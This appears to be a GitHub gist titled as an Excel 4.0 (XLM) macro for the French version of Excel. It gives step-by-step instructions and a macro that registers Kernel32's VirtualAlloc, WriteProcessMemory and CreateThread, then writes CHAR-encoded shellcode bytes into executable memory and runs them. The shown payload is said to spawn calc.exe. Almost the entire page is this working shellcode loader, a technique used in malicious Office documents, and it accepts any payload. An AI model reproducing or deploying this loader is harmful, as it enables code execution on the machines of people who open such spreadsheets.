Created
November 20, 2019 13:00
-
-
Save seclib/b0c62a78758431c0feb28f4252102234 to your computer and use it in GitHub Desktop.
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL | |
| 1. Open Excel | |
| 2. Click on the active tab | |
| 3. Select "Insérer" | |
| 4. Click on "Macro MS Excel 4.0". | |
| 5. This will create a new worksheet called "Macro1" | |
| ================================================================================ | |
| In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1: | |
| ================================================================================ | |
| =REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9) | |
| =REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9) | |
| =REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9) | |
| =VAlloc(0;4096;4096;64) | |
| =SELECTIONNER(B1:B50;B1) | |
| =POSER.VALEUR(C1;0) | |
| =TANT.QUE(CELLULE.ACTIVE()<>"END") | |
| =POSER.VALEUR(C2;NBCAR(CELLULE.ACTIVE())) | |
| =WProcessMemory(-1; A4 + (C1 * 255); CELLULE.ACTIVE();NBCAR(CELLULE.ACTIVE()); 0) | |
| =POSER.VALEUR(C1; C1 +1) | |
| =SELECTIONNER(;"L(1)C") | |
| =SUIVANT() | |
| =CThread(0;0;A4;0;0;0) | |
| =ARRETER() | |
| ================================================================================ | |
| In the Macro1 worksheet, paste the following shellcode payload in column B, starting in cell B1 (spawns calc.exe): | |
| ================================================================================ | |
| =CAR(217)&CAR(238)&CAR(184)&CAR(239)&CAR(216)&CAR(65)&CAR(149)&CAR(217)&CAR(116)&CAR(36)&CAR(244)&CAR(95)&CAR(49)&CAR(201)&CAR(177)&CAR(49)&CAR(131)&CAR(199)&CAR(4)&CAR(49)&CAR(71)&CAR(20)&CAR(3)&CAR(71)&CAR(251)&CAR(58)&CAR(180)&CAR(105)&CAR(235)&CAR(57)&CAR(55)&CAR(146)&CAR(235)&CAR(93)&CAR(177)&CAR(119)&CAR(218)&CAR(93)&CAR(165)&CAR(252)&CAR(76)&CAR(110)&CAR(173)&CAR(81)&CAR(96)&CAR(5)&CAR(227)&CAR(65)&CAR(243)&CAR(107)&CAR(44)&CAR(101)&CAR(180)&CAR(198)&CAR(10)&CAR(72)&CAR(69)&CAR(122)&CAR(110)&CAR(203)&CAR(197)&CAR(129)&CAR(163)&CAR(43)&CAR(244)&CAR(73)&CAR(182)&CAR(42)&CAR(49)&CAR(183)&CAR(59)&CAR(126)&CAR(234)&CAR(179)&CAR(238)&CAR(111)&CAR(159)&CAR(142)&CAR(50)&CAR(27)&CAR(211)&CAR(31)&CAR(51)&CAR(248)&CAR(163)&CAR(30)&CAR(18)&CAR(175)&CAR(184)&CAR(120)&CAR(180)&CAR(81)&CAR(109)&CAR(241)&CAR(253)&CAR(73)&CAR(114)&CAR(60)&CAR(183)&CAR(226)&CAR(64)&CAR(202)&CAR(70)&CAR(35)&CAR(153)&CAR(51)&CAR(228)&CAR(10)&CAR(22)&CAR(198)&CAR(244)&CAR(75)&CAR(144)&CAR(57)&CAR(131)&CAR(165)&CAR(227)&CAR(196)&CAR(148)&CAR(113)&CAR(158)&CAR(18)&CAR(16)&CAR(98)&CAR(56)&CAR(208)&CAR(130)&CAR(78)&CAR(185)&CAR(53)&CAR(84)&CAR(4)&CAR(181)&CAR(242)&CAR(18)&CAR(66)&CAR(217)&CAR(5)&CAR(246)&CAR(248)&CAR(229)&CAR(142)&CAR(249)&CAR(46)&CAR(108)&CAR(212)&CAR(221)&CAR(234)&CAR(53)&CAR(142)&CAR(124)&CAR(170)&CAR(147)&CAR(97)&CAR(128)&CAR(172)&CAR(124)&CAR(221)&CAR(36)&CAR(166)&CAR(144)&CAR(10)&CAR(85)&CAR(229)&CAR(254)&CAR(205)&CAR(235)&CAR(147)&CAR(76)&CAR(205)&CAR(243)&CAR(155)&CAR(224)&CAR(166)&CAR(194)&CAR(16)&CAR(111)&CAR(176)&CAR(218)&CAR(242)&CAR(212)&CAR(78)&CAR(145)&CAR(95)&CAR(124)&CAR(199)&CAR(124)&CAR(10)&CAR(61)&CAR(138)&CAR(126)&CAR(224)&CAR(1)&CAR(179)&CAR(252)&CAR(1)&CAR(249)&CAR(64)&CAR(28)&CAR(96)&CAR(252)&CAR(13)&CAR(154)&CAR(152)&CAR(140)&CAR(30)&CAR(79)&CAR(159)&CAR(35)&CAR(30)&CAR(90)&CAR(252)&CAR(162)&CAR(140)&CAR(6)&CAR(45)&CAR(65)&CAR(53)&CAR(172)&CAR(49) | |
| END |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment